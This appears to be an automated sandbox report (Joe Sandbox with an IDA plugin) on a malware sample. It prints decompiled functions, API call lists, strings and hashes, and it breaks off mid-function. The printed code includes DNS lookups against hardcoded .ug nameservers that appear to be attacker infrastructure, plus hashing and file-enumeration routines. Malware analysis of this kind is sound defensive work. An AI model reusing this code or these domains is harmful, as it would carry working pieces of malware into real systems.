															asm("sbb eax, eax");
															_t407 = _t409 | 0x00000001;
															goto L72;
														}
														__eflags = _t409 - 0xfffffffd;
														if(_t409 == 0xfffffffd) {
															goto L71;
														}
														__eflags =  *((intOrPtr*)(_t527 + 1)) -  *((intOrPtr*)(_t544 + 1));
														if( *((intOrPtr*)(_t527 + 1)) !=  *((intOrPtr*)(_t544 + 1))) {
															goto L70;
														}
														__eflags = _t409 - 0xfffffffe;
														if(_t409 == 0xfffffffe) {
															goto L71;
														}
														__eflags =  *((intOrPtr*)(_t527 + 2)) -  *((intOrPtr*)(_t544 + 2));
														if( *((intOrPtr*)(_t527 + 2)) !=  *((intOrPtr*)(_t544 + 2))) {
															goto L70;
														}
														__eflags = _t409 - 0xffffffff;
														if(_t409 == 0xffffffff) {
															goto L71;
														}
														_t409 =  *((intOrPtr*)(_t527 + 3));
														__eflags = _t409 -  *((intOrPtr*)(_t544 + 3));
														if(_t409 ==  *((intOrPtr*)(_t544 + 3))) {
															goto L71;
														}
														goto L70;
													}
													while(1) {
														__eflags =  *_t527 -  *_t544;
														if( *_t527 !=  *_t544) {
															goto L63;
														}
														_t527 = _t527 + 4;
														_t544 = _t544 + 4;
														_t409 = _t409 - 4;
														__eflags = _t409;
														if(_t409 >= 0) {
															continue;
														}
														goto L62;
													}
													goto L63;
												}
											}
											_t540 = 0;
											goto L54;
											L78:
											_t553 = _v120 + 1;
											_t402 = _v18;
											_t526 = _v132 + 0x18;
											_v120 = _t553;
											__eflags = _t553 - _t534;
											_t544 = _v52;
											_v132 = _t526;
										} while (_t553 < _t534);
										_t444 = _v28;
										goto L80;
										L118:
										_t347 =  *_v112;
										_v112 = _t347;
										__eflags = _t347;
									} while (_t347 != 0);
								}
								_t459 = _v116 + 1;
								_t344 = _v124 + 0x18;
								_v116 = _t459;
								_v124 = _t344;
								__eflags = _t459 - _v108;
							} while (_t459 < _v108);
							_t544 = _v52;
							_t534 = _v40;
							goto L121;
						}
						__eflags = _t555 - _t305;
						if(_t555 > _t305) {
							goto L29;
						}
						_t496 = _v40;
						_t558 = (0x2aaaaaab * (_t305 - _t555) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t305 - _t555) >> 0x20 >> 2);
						__eflags = _t496 - _t533;
						if(_t496 == _t533) {
							E00415230(_t437,  &_v44, _t533, _t496);
							_t533 = _v36;
							_t496 = _v40;
						}
						_t305 = _t558 + _t558 * 2;
						_t559 = _v44 + _t305 * 8;
						__eflags = _t496;
						if(_t496 != 0) {
							 *(_t496 + 0x14) = 0xf;
							 *((intOrPtr*)(_t496 + 0x10)) = 0;
							 *_t496 = 0;
							__eflags =  *(_t559 + 0x14) - 0x10;
							if( *(_t559 + 0x14) >= 0x10) {
								 *_t496 =  *_t559;
								 *_t559 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t559 + 0x10)) + 1;
								__eflags = _t425;
								if(_t425 != 0) {
									E004205A0(_t496, _t559, _t425);
									_t496 = _v40;
									_t564 = _t564 + 0xc;
								}
							}
							 *((intOrPtr*)(_t496 + 0x10)) =  *((intOrPtr*)(_t559 + 0x10));
							_t305 =  *(_t559 + 0x14);
							 *(_t496 + 0x14) = _t305;
							 *(_t559 + 0x14) = 0xf;
							 *((intOrPtr*)(_t559 + 0x10)) = 0;
							 *_t559 = 0;
						}
						goto L37;
						L17:
						_t412 =  *_t493;
						_t493 = _t493 + 1;
						__eflags = _t412;
						if(_t412 != 0) {
							goto L17;
						} else {
							_t494 = _t493 - _t554;
							__eflags = _t494;
							_t555 = _v44;
							goto L19;
						}
					}
					_t447 = _a24;
					_t502 = _a4;
					_t430 =  >=  ? _t502 :  &_a4;
					if(( >=  ? _t502 :  &_a4)[_t542] == 0x2f) {
						__eflags = 0;
						 *((short*)(_t560 + _t542 * 2 - 0xa0a8)) = 0;
						break;
					} else {
						_t433 =  >=  ? _t502 :  &_a4;
						 *((short*)(_t560 + _t542 * 2 - 0xa0a8)) = ( >=  ? _t502 :  &_a4)[_t542];
						_t542 = _t542 + 1;
						continue;
					}
				}
				_t533 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_t305 = 0;
				_v32 = 0;
				_v28 = 0;
				_v48 = 0;
				_v24 = 0;
				_v8 = 2;
				_t437 = 0;
				__eflags = 0;
				_v160 = "ns1.kriston.ug";
				_v156 = "ns2.chalekin.ug";
				_v152 = "ns3.unalelath.ug";
				_v148 = "ns4.andromath.ug";
				goto L11;
			}

0x0040dd40
0x0040dd43
0x0040dd4b
0x0040dd50
0x0040dd56
0x0040dd5d
0x0040dd62
0x0040dd63
0x0040dd64
0x0040dd65
0x0040dd6b
0x0040dd75
0x0040dd83
0x0040dd88
0x0040dd8c
0x0040dd8d
0x0040dd92
0x0040dd97
0x0040dd99
0x0040dd9d
0x0040dda0
0x0040dda0
0x0040ddac
0x0040ddb1
0x0040ddb5
0x0040ddb6
0x0040ddbb
0x0040ddc0
0x0040ddc2
0x0040ddc9
0x0040ddc9
0x0040ddd6
0x0040dde4
0x0040dde9
0x0040ddef
0x0040ddf2
0x0040ddf5
0x0040ddf7
0x0040de00
0x0040de06
0x0040de0e
0x00000000
0x00000000
0x0040de13
0x0040deea
0x0040deef
0x0040def4
0x0040def4
0x0040def6
0x0040def6
0x0040def6
0x0040df0c
0x0040df0c
0x0040df11
0x0040df16
0x0040df1a
0x0040df1d
0x0040df20
0x0040df22
0x0040dfc2
0x0040dfc2
0x0040dfc4
0x0040dfca
0x0040dfcf
0x0040dfd2
0x0040dfd2
0x0040dfd5
0x0040dfd7
0x0040dfd9
0x0040dfe0
0x0040dfe7
0x0040dfea
0x0040dfee
0x0040e00c
0x0040e00e
0x0040dff0
0x0040dff3
0x0040dff3
0x0040dff4
0x0040dffc
0x0040e001
0x0040e004
0x0040e004
0x0040dff4
0x0040e018
0x0040e01b
0x0040e01e
0x0040e021
0x0040e028
0x0040e02f
0x0040e02f
0x0040e033
0x0040e033
0x0040e036
0x0040e03a
0x0040e03e
0x0040e041
0x0040e046
0x0040e04b
0x0040e04b
0x0040e04e
0x0040e051
0x0040e051
0x0040e052
0x0040e055
0x0040dea0
0x0040dea7
0x0040dead
0x0040deaf
0x00000000
0x00000000
0x0040deb5
0x0040deba
0x00000000
0x00000000
0x0040dec3
0x0040dec7
0x0040decd
0x0040decf
0x0040ded6
0x0040dedd
0x0040dee1
0x0040dee4
0x00000000
0x0040dee6
0x0040dee6
0x00000000
0x0040dee6
0x0040dee4
0x0040e05b
0x0040e062
0x0040e067
0x0040e06b
0x0040e06c
0x0040e071
0x0040e074
0x0040e07e
0x0040e084
0x0040e087
0x0040e089
0x0040e08e
0x0040e098
0x0040e09d
0x0040e0a8
0x0040e0a8
0x0040e0aa
0x0040e0ad
0x0040e48d
0x0040e48d
0x0040e490
0x0040e492
0x0040e495
0x0040e495
0x0040e4a0
0x0040e4ae
0x0040e4bc
0x0040e4c1
0x0040e4d0
0x0040e4d6
0x0040e4d8
0x0040e557
0x0040e557
0x0040e55e
0x0040e56a
0x00000000
0x0040e4da
0x0040e4da
0x0040e4df
0x0040e4e1
0x0040e4e8
0x0040e4ef
0x0040e4f6
0x0040e4f8
0x0040e505
0x0040e50a
0x0040e50d
0x0040e511
0x0040e513
0x0040e513
0x0040e515
0x0040e523
0x0040e525
0x0040e52c
0x0040e534
0x0040e539
0x0040e539
0x0040e549
0x0040e570
0x0040e570
0x0040e578
0x0040e57f
0x0040e586
0x0040e589
0x0040e590
0x0040e596
0x0040e59c
0x0040e5a0
0x0040e5a0
0x0040e5a3
0x0040e5a6
0x0040e5a6
0x0040e5ab
0x0040e5ab
0x0040e5ad
0x0040e5af
0x0040e5af
0x0040e5b9
0x0040e5be
0x0040e5c1
0x0040e5c3
0x0040e604
0x0040e604
0x0040e607
0x0040e609
0x0040e642
0x0040e642
0x0040e646
0x0040e64b
0x0040e650
0x0040e65e
0x0040e669
0x0040e669
0x0040e60b
0x0040e60d
0x0040e60f
0x0040e639
0x0040e63a
0x0040e63f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e611
0x0040e611
0x0040e611
0x0040e615
0x0040e619
0x0040e61e
0x0040e61e
0x0040e621
0x0040e628
0x0040e62f
0x0040e632
0x0040e635
0x0040e635
0x00000000
0x0040e611
0x0040e5c5
0x0040e5c8
0x0040e5ca
0x0040e5cc
0x0040e5fb
0x0040e5fc
0x0040e601
0x00000000
0x0040e601
0x0040e5d0
0x0040e5d0
0x0040e5d4
0x0040e5d8
0x0040e5dd
0x0040e5dd
0x0040e5e0
0x0040e5e7
0x0040e5ee
0x0040e5f1
0x0040e5f4
0x0040e5f4
0x0040e5f8
0x00000000
0x0040e5f8
0x0040e592
0x00000000
0x0040e592
0x0040e4d8
0x0040e0b3
0x0040e0b5
0x0040e0b8
0x0040e0b8
0x0040e0bc
0x0040e0be
0x0040e0be
0x0040e0c1
0x0040e0c7
0x0040e0cc
0x0040e0de
0x0040e0e5
0x0040e0eb
0x0040e0ee
0x0040e0f1
0x0040e0f3
0x0040e0f9
0x0040e100
0x0040e103
0x0040e109
0x0040e10b
0x0040e111
0x0040e11e
0x0040e12d
0x0040e12d
0x0040e12f
0x0040e135
0x0040e220
0x0040e220
0x0040e223
0x0040e223
0x0040e225
0x00000000
0x00000000
0x0040e22b
0x0040e232
0x0040e239
0x0040e23c
0x0040e23e
0x0040e24e
0x0040e250
0x0040e250
0x0040e253
0x0040e253
0x0040e255
0x0040e256
0x0040e256
0x0040e25a
0x0040e25a
0x0040e25c
0x0040e25c
0x0040e261
0x0040e266
0x0040e269
0x0040e26d
0x0040e26f
0x0040e371
0x0040e371
0x0040e374
0x0040e376
0x0040e3e8
0x0040e3e8
0x0040e3ea
0x0040e3ec
0x0040e3f3
0x0040e3fa
0x0040e3fd
0x0040e401
0x0040e41c
0x0040e41e
0x0040e403
0x0040e406
0x0040e406
0x0040e407
0x0040e40f
0x0040e414
0x0040e414
0x0040e407
0x0040e428
0x0040e42e
0x0040e431
0x0040e438
0x0040e43f
0x0040e43f
0x0040e443
0x0040e443
0x0040e446
0x0040e44a
0x0040e44e
0x0040e451
0x0040e456
0x0040e45b
0x0040e45b
0x00000000
0x0040e451
0x0040e383
0x0040e38d
0x0040e390
0x00000000
0x00000000
0x0040e399
0x0040e39c
0x0040e54d
0x0040e54d
0x0040e552
0x00000000
0x0040e552
0x0040e3a5
0x0040e3bf
0x0040e3c3
0x0040e3c7
0x0040e3c9
0x0040e3cf
0x0040e3cf
0x0040e3cb
0x0040e3cb
0x0040e3cb
0x0040e3d1
0x0040e3d3
0x0040e3d3
0x0040e3da
0x0040e3e2
0x0040e3e5
0x00000000
0x0040e3e5
0x0040e275
0x0040e277
0x0040e27a
0x0040e27c
0x00000000
0x00000000
0x0040e293
0x0040e295
0x0040e298
0x0040e29a
0x0040e30a
0x0040e310
0x0040e313
0x0040e315
0x0040e31b
0x0040e322
0x0040e329
0x0040e32c
0x0040e330
0x0040e347
0x0040e349
0x0040e332
0x0040e335
0x0040e335
0x0040e336
0x0040e33b
0x0040e340
0x0040e340
0x0040e336
0x0040e352
0x0040e358
0x0040e35b
0x0040e362
0x0040e369
0x0040e369
0x00000000
0x0040e315
0x0040e2a7
0x0040e2b1
0x0040e2b4
0x00000000
0x00000000
0x0040e2bd
0x0040e2c0
0x00000000
0x00000000
0x0040e2d1
0x0040e2e1
0x0040e2e5
0x0040e2e9
0x0040e2eb
0x0040e2f1
0x0040e2f1
0x0040e2ed
0x0040e2ed
0x0040e2ed
0x0040e2f3
0x0040e2f5
0x0040e2fc
0x0040e304
0x0040e307
0x00000000
0x0040e307
0x0040e240
0x00000000
0x0040e240
0x0040e13e
0x0040e140
0x0040e140
0x0040e143
0x0040e146
0x0040e150
0x0040e150
0x0040e152
0x0040e158
0x0040e15a
0x0040e15a
0x0040e160
0x0040e160
0x0040e162
0x0040e163
0x0040e163
0x0040e167
0x0040e167
0x0040e169
0x0040e169
0x0040e16d
0x0040e16f
0x0040e176
0x0040e176
0x0040e171
0x0040e171
0x0040e171
0x0040e179
0x0040e17d
0x0040e180
0x0040e182
0x0040e1e0
0x0040e1e0
0x0040e1e2
0x0040e1eb
0x0040e1ed
0x0040e1ed
0x0040e1ed
0x0040e1e4
0x0040e1e4
0x0040e1e4
0x0040e1f0
0x00000000
0x0040e184
0x0040e184
0x0040e184
0x0040e187
0x0040e1a1
0x0040e1a1
0x0040e1a4
0x0040e1da
0x0040e1da
0x0040e1da
0x0040e1dc
0x0040e1dc
0x0040e1de
0x0040e1f2
0x0040e1f2
0x0040e1fd
0x0040e244
0x0040e247
0x0040e249
0x00000000
0x0040e249
0x00000000
0x0040e1fd
0x00000000
0x0040e1de
0x0040e1a6
0x0040e1a8
0x0040e1aa
0x0040e1d3
0x0040e1d3
0x0040e1d5
0x00000000
0x0040e1d5
0x0040e1ac
0x0040e1af
0x00000000
0x00000000
0x0040e1b4
0x0040e1b7
0x00000000
0x00000000
0x0040e1b9
0x0040e1bc
0x00000000
0x00000000
0x0040e1c1
0x0040e1c4
0x00000000
0x00000000
0x0040e1c6
0x0040e1c9
0x00000000
0x00000000
0x0040e1cb
0x0040e1ce
0x0040e1d1
0x00000000
0x00000000
0x00000000
0x0040e1d1
0x0040e190
0x0040e192
0x0040e194
0x00000000
0x00000000
0x0040e196
0x0040e199
0x0040e19c
0x0040e19c
0x0040e19f
0x00000000
0x00000000
0x00000000
0x0040e19f
0x00000000
0x0040e190
0x0040e182
0x0040e154
0x00000000
0x0040e1ff
0x0040e205
0x0040e206
0x0040e209
0x0040e20c
0x0040e20f
0x0040e211
0x0040e214
0x0040e214
0x0040e21d
0x00000000
0x0040e45e
0x0040e461
0x0040e463
0x0040e466
0x0040e466
0x0040e100
0x0040e474
0x0040e475
0x0040e478
0x0040e47b
0x0040e47e
0x0040e47e
0x0040e487
0x0040e48a
0x00000000
0x0040e48a
0x0040df28
0x0040df2a
0x00000000
0x00000000
0x0040df3b
0x0040df46
0x0040df48
0x0040df4a
0x0040df50
0x0040df55
0x0040df58
0x0040df58
0x0040df5e
0x0040df61
0x0040df64
0x0040df66
0x0040df6c
0x0040df73
0x0040df7a
0x0040df7d
0x0040df81
0x0040df9b
0x0040df9d
0x0040df83
0x0040df86
0x0040df86
0x0040df87
0x0040df8c
0x0040df91
0x0040df94
0x0040df94
0x0040df87
0x0040dfa6
0x0040dfa9
0x0040dfac
0x0040dfaf
0x0040dfb6
0x0040dfbd
0x0040dfbd
0x00000000
0x0040df00
0x0040df00
0x0040df02
0x0040df03
0x0040df05
0x00000000
0x0040df07
0x0040df07
0x0040df07
0x0040df09
0x00000000
0x0040df09
0x0040df05
0x0040de19
0x0040de1f
0x0040de25
0x0040de2d
0x0040de47
0x0040de49
0x00000000
0x0040de2f
0x0040de35
0x0040de3c
0x0040de44
0x00000000
0x0040de44
0x0040de2d
0x0040de53
0x0040de55
0x0040de58
0x0040de5b
0x0040de5e
0x0040de60
0x0040de63
0x0040de66
0x0040de69
0x0040de6c
0x0040de70
0x0040de70
0x0040de72
0x0040de7c
0x0040de86
0x0040de90
0x00000000

APIs

_wcsstr.LIBCMT ref: 0040DD8D
_wcsstr.LIBCMT ref: 0040DDB6
_memset.LIBCMT ref: 0040DDE4
lstrlenW.KERNEL32(?), ref: 0040DE0A
gethostbyname.WS2_32(00500134), ref: 0040DEA7
inet_ntoa.WS2_32(?), ref: 0040DEC7

Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F27F
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F294
Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F2AD
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F2C2
Part of subcall function 0044F26C: std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F2E2
Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F2FB
Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F310

_memmove.LIBCMT ref: 0040DF8C
_memmove.LIBCMT ref: 0040DFFC
_wcsstr.LIBCMT ref: 0040E06C
LocalAlloc.KERNEL32(00000040,00000008), ref: 0040E07E
inet_addr.WS2_32(?), ref: 0040E0C1
DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 0040E0E5
inet_ntoa.WS2_32(?), ref: 0040E103
_memmove.LIBCMT ref: 0040E33B
_memmove.LIBCMT ref: 0040E40F
LocalFree.KERNEL32(?), ref: 0040E495
DnsFree.DNSAPI(?,00000001), ref: 0040E4A0
_memset.LIBCMT ref: 0040E4BC
lstrcpyW.KERNEL32 ref: 0040E4D0
lstrcatW.KERNEL32(?,00000000), ref: 0040E523
lstrcatW.KERNEL32(?,?), ref: 0040E549
lstrcatW.KERNEL32(?,?), ref: 0040E56A

Strings

ns4.andromath.ug, xrefs: 0040DE90
https://, xrefs: 0040DDAC
ns1.kriston.ug, xrefs: 0040DE72
http://, xrefs: 0040DD83, 0040E4CA
ns3.unalelath.ug, xrefs: 0040DE86
ns2.chalekin.ug, xrefs: 0040DE7C
vector<T> too long, xrefs: 0040E54D
invalid string position, xrefs: 0040DEEA

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
String ID: http://$https://$invalid string position$ns1.kriston.ug$ns2.chalekin.ug$ns3.unalelath.ug$ns4.andromath.ug$vector<T> too long
API String ID: 2428799424-3661121819
Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction ID: d0e64e8ea33e45a7fb560775d2837a96188487c5265d8965212a1f6c8b2ea466
Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
Instruction Fuzzy Hash: AA52E071A002199FCF24CFA9C880BAEBBF1BF44304F14897EE805AB381D7799955CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410FC0(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				int _v48;
				char _v52;
				char _v56;
				char _v68;
				void* __ebx;
				void* __edi;
				long** _t40;
				int* _t41;
				int _t42;
				char _t44;
				char _t50;
				void* _t72;
				CHAR** _t73;
				void* _t80;
				int _t81;
				void* _t83;
				CHAR* _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t93;

				_t79 = __edx;
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x34;
				_v20 = _t90;
				_t40 =  &_v32;
				_t73 = __edx;
				_v32 = 0;
				_t84 = __ecx;
				_v28 = 0;
				_v36 = 0;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
				if(_t40 == 0) {
					_v40 = _t40;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t41 =  &_v28;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
				if(_t41 == 0) {
					_v44 = _t41;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t42 = lstrlenA(_t84);
				__imp__CryptHashData(_v28, _t84, _t42, 0);
				if(_t42 == 0) {
					_v48 = _t42;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t85 = __imp__CryptGetHashParam;
				_v24 = 0;
				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
				_t98 = _t44;
				if(_t44 == 0) {
					_v52 = _t44;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
				_v36 = _t81;
				E0042B420(_t81, 0, _v24 + 1);
				_t92 = _t90 + 0x10;
				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
				if(_t50 == 0) {
					_v56 = _t50;
					E00430ECA( &_v56, 0x5085b8);
				}
				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
				E0042B420(_t52, 0, 0x14 + _v24 * 2);
				_t87 = 0;
				_t93 = _t92 + 0x10;
				if(_v24 > 0) {
					do {
						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
						_t93 = _t93 + 0xc;
						lstrcatA( *_t73,  &_v68);
						_t87 = _t87 + 1;
					} while (_t87 < _v24);
				}
				E00422110(_t81);
				__imp__CryptDestroyHash(_v28);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}

0x00410fc0
0x00410fd1
0x00410fd8
0x00410fde
0x00410fe1
0x00410ff0
0x00410ff2
0x00410ff9
0x00410ffb
0x00411002
0x00411009
0x00411010
0x00411018
0x0041101a
0x00411026
0x00411026
0x0041102b
0x0041103b
0x00411043
0x00411045
0x00411051
0x00411051
0x00411059
0x00411064
0x0041106c
0x0041106e
0x0041107a
0x0041107a
0x0041107f
0x00411092
0x00411099
0x0041109b
0x0041109d
0x0041109f
0x004110ab
0x004110ab
0x004110c1
0x004110c3
0x004110ca
0x004110cf
0x004110de
0x004110e2
0x004110e4
0x004110f0
0x004110f0
0x00411109
0x0041110b
0x00411110
0x00411112
0x00411118
0x00411120
0x0041112e
0x00411133
0x0041113c
0x00411142
0x00411143
0x00411120
0x00411149
0x00411154
0x0041115f
0x0041116a
0x00411177

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411900(WCHAR* __ecx, long __edx, WCHAR* _a4) {
				short _v8;
				WCHAR* _v12;
				short _v2060;
				int _t15;
				long _t36;
				void* _t44;
				WCHAR* _t48;

				_t36 = __edx;
				_v12 = __ecx;
				if(__edx == 0) {
					_t36 = GetLastError();
				}
				FormatMessageW(0x1300, 0, _t36, 0x400,  &_v8, 0, 0);
				_t15 = lstrlenW(_v8);
				_t44 = LocalAlloc(0x40, 0x50 + (_t15 + lstrlenW(_v12)) * 2);
				lstrcpyW(_t44, _v12);
				lstrcatW(_t44, L" failed with error ");
				E00412AC0(_t36,  &_v2060);
				lstrcatW(_t44,  &_v2060);
				lstrcatW(_t44, L": ");
				lstrcatW(_t44, _v8);
				_t48 = _a4;
				if(_t48 == 0) {
					MessageBoxW(0, _t44, 0, 0);
				} else {
					if(lstrlenW(_t44) < 0x400) {
						lstrcpynW(_t48, _t44, 0x400);
						E00412BA0(_t48);
					} else {
						E0042B420(_t48, 0, 0x800);
						E0042D8D0(_t48, _t44, 0x7fe);
						E00412BA0(_t48);
					}
				}
				LocalFree(_v8);
				return LocalFree(_t44);
			}

0x0041190a
0x0041190c
0x00411913
0x0041191b
0x0041191b
0x00411932
0x00411941
0x0041195f
0x00411962
0x00411974
0x0041197e
0x0041198b
0x00411993
0x00411999
0x0041199b
0x004119a0
0x004119f2
0x004119a2
0x004119ae
0x004119dc
0x004119e4
0x004119b0
0x004119b8
0x004119c4
0x004119ce
0x004119ce
0x004119ae
0x00411a01
0x00411a0c

APIs

GetLastError.KERNEL32 ref: 00411915
FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
lstrcpyW.KERNEL32 ref: 00411962
lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
lstrcatW.KERNEL32(00000000,?), ref: 0041198B
lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
lstrcatW.KERNEL32(00000000,?), ref: 00411999
lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
_memset.LIBCMT ref: 004119B8
lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC

Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9

LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04

Strings

failed with error , xrefs: 0041196E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
String ID: failed with error
API String ID: 4182478520-946485432
Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED

Uniqueness

Uniqueness Score: -1.00%

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E0040F730(intOrPtr __ecx, signed int __edx, char _a4, intOrPtr _a24, intOrPtr _a28, char _a32) {
				signed int _v8;
				intOrPtr _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				WCHAR* _v92;
				short _v104;
				signed int _v108;
				signed int _v112;
				char _v128;
				signed int _v132;
				signed int _v136;
				short _v152;
				char _v156;
				signed int _v160;
				signed int _v164;
				short _v180;
				intOrPtr _v184;
				char _v204;
				struct _WIN32_FIND_DATAW _v796;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t305;
				intOrPtr _t315;
				WCHAR* _t322;
				void* _t323;
				void* _t326;
				signed int _t330;
				signed int _t331;
				int _t333;
				signed int _t335;
				signed int _t336;
				intOrPtr _t340;
				intOrPtr _t346;
				intOrPtr* _t348;
				void* _t349;
				void* _t352;
				intOrPtr* _t354;
				void* _t355;
				intOrPtr* _t356;
				void* _t357;
				void* _t374;
